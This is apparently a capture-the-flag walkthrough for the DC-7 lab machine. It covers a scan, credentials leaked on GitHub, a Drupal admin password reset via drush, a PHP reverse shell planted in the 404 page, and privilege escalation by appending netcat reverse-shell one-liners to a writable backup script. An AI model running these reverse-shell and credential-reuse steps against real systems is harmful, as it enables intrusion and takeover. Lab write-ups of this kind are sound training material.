We start scanning the box with nmap -A -T4 -p- 192.168.1.5 –vv
Actually if we take a look at the main page there is a username there, I googled it and took me to a Twitter page and then there is a link to GitHub to the user which is just a page to this box where we can find some files , among them there is a file called config.php and inside it the username and the password
User dc7user password MdR3xOgB7#dW , anyhow the username and password didn’t work to login in Drupla page , but ssh did work.
Inside the home directory there is a file mbox, viewing it came with a path to another file /opt/scripts/backups.sh
Viewing the file backups.sh:
Googling how to use drush gave me a way to change the admin password with drush user-password admin –password=admin123
Writing the command in /tmp didn’t work so had to write it in /var/www/html
Now we can login to the Drupal page using the new password we gave:
Now we need to upload a shell to the website , but the php module is not installed and we need to install it from this webpage
https://www.drupal.org/project/php/releases/8.x-1.0
Then click on Enable newly added modules
Now go to http://192.168.1.5/admin/modules and scroll down to the middle of the page and activate php filter and then click install at the end of the page to activate it.
Now go the content section and edit the 404 page, so we can upload a php script there
On our machine we ready with nc –lvp 4444, and as soon as I click publish button:
Now back to the backups.sh file located at /opt/scripts the file is writable and executable so we can add some sort of shell script inside to make a connection back to our machine:
I tried echo “nc -e /bin/sh 192.168.1.11 443” >> backups.sh but didn’t work, so I tried msfvenom instead:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.11 lport=6666 R
echo “mkfifo /tmp/mjohwp; nc 192.168.1.11 6666 0</tmp/mjohwp | /bin/sh >/tmp/mjohwp 2>&1; rm /tmp/mjohwp” >>backups.sh
Now we wait till the script is run and we get a shell on our machine with nc –lvp 6666
